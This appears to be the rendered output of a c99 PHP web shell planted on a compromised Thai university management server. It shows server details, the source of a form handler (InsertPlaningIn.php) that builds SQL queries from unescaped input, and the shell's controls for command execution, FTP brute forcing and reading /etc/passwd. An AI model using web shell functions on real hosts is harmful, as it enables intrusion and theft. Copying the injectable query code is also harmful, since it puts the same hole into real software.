!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     InsertPlaningIn.php (5.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    session_start
();
    
    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');

    
/**  Check Session User Login  */
    
if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo 
"<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo 
"<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        
/**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"../includes/Function.php" );
        require_once( 
"../includes/FunctionDB.php" );
    
        
/**  Create Database Object  */
        
$dbObj = new DBConn;
        
/**  Config Table for This Page  */
        
$myTable "project_tb";
    
        
        
$Project_code$_POST['Project_code'];
        
$Faculty_code $_POST['Faculty_code'];
        
$Teacher_code $_POST['Teacher_code'];
        
$Project_plan $_POST['Project_plan'];
        
$Orderlist $_POST['Orderlist'];
        
$Training_name htmlspecialcharstrim$_POST['Training_name'] ) );
        
$programId $_POST['programId'];
        
$Year $_POST['Year'];
        
$MoneyS_C $_POST['MoneyS_C'];
        
$MoneyId $_POST['MoneyId'];
        
$Ind $_POST['Ind'];
         
$Date trim$_POST['Date'] );
        
$Budget_use =  $_POST['Budget_use'];
        
///*-------- นำค่า id มาเพิ่มให้กับค่ารหัสครั้งละ1 -----------*//
           
$query " SELECT *  FROM  $myTable  ORDER  BY   codeId  DESC ";
          
$result $dbObj->execQuery($query);
         
$rss$dbObj->fetchArray($result);
         
$myTable  $rss[0]+// นำค่า id มาเพิ่มให้กับค่ารหัสสมาชิกครั้งละ1
        //  if($myTable2>=100) {
         
$ProjectNo "$Project$myTable" ;
         
$Spending_use ="$Budget_use";
        
//###  Call Function ( table --> 'project_tb' )
        
InsertProject$Training_code$Project_code$ProjectId$MoneyId$MoneyS_C$Faculty_code$Teacher_code$Ind$Orderlist$Project_plan$Training_name$Date$Budget_use$Spending_use$programId$Budget_Year$Year ); 
    } 
# else
 
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<title>MIS -- Teacher</title></head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
    
include("../templates/incHeader.php");
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td>
    <td width="800" height="440" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset>
     <table width="780" border="0" cellspacing="0" cellpadding="0">
      <form id="myForm" name="myForm" method="post" action="InsertPlaningIn.php">
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td style="padding-left:15px;"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>&raquo; <a href="Menu_Teach.php">ข้อมูลทั่วไปบุคลากร</a> &raquo; <a href="PlaningByYear.php??Teacher_code=<?=$Teacher_code;?>&amp;Faculty_code=<?=$Faculty_code;?>">ข้อมูลการแผนดำเนินการ</a> &raquo; <a href="PlanStdList.php?Teacher_code=<?=$Teacher_code;?>&amp;Budget_Year=<?=$Budget_Year;?>&amp;Faculty_code=<?=$Faculty_code;?>">แผนดำเนินการรายปี</a></strong> <strong>&raquo; </strong> <a href="PlaningList.php?Teacher_code=<?=$Teacher_code;?>&amp;Budget_Year=<?=$Budget_Year;?>&amp;Faculty_code=<?=$Faculty_code;?>&amp;Project_code=<?=$Project_code;?>">
          <strong><?php
                 $sql2 
" SELECT *  FROM projectstdplan_tb  WHERE  Project_code='$Project_code' ";
                 
$result2 $dbObj->execQuery($sql2);
                 
$rs2 $dbObj->fetchArray($result2);
                  echo 
$rs2['Project_plan'];
              
?></strong></a></td>
      </tr>
      <tr>
        <td align="center">
        <table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
          <tr>
            <td>&nbsp;</td>
          </tr>
          <tr>
            <td>&nbsp;<a href="DetailRepPlaning.php?ProjectId=<? echo $rs[ProjectId]?>&Project_code=<? echo $rs[Project_code]?>&Faculty_code=<? echo $rs[Faculty_code]?>&Teacher_code=<? echo $rs1[Teacher_code]?> ">รายงานการใช้เงินตามข้อย่อยแผน</a> &raquo; <span class="TEXT-GREEN10">เพิ่มข้อมูลแผน/โครงการดำเนินการ (ข้อย่อย)</span></td>
          </tr>
          <tr>
            <td>&nbsp;</td>
          </tr>
        </table>
          <table width="760" border="0" align="center" cellpadding="0" cellspacing="0" style=" border:0px solid gray"size="12">
          <tr>
            <td height="43" ><table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="#E0E0E0" style="border:1px solid #CCCCCC">
              <tr>
                <td height="150" align="center"><span class="TEXT-GREEN10"><strong>ระบบจัดเก็บข้อมูลของท่านเรียบร้อยแล้ว</strong></span><br />
                  <br />
                  กรุณารอสักครู่ กำลังเปลี่ยนหน้าอัตโนมัติ<br />
                  <?php 
                      
echo"<meta http-equiv=\"refresh\" content=\"1;URL=PlaningList.php?Faculty_code=$Faculty_code&Budget_Year=$Budget_Year&Project_code=$Project_code\">\n";
                  
?></td>
              </tr>
            </table></td>
          </tr>
          </table>
        <table width="100%" border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td>&nbsp;</td>
          </tr>
        </table></td>
      </tr></form>
    </table>
   </fieldset></td>
  </tr></table>
</body></html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0099 ]--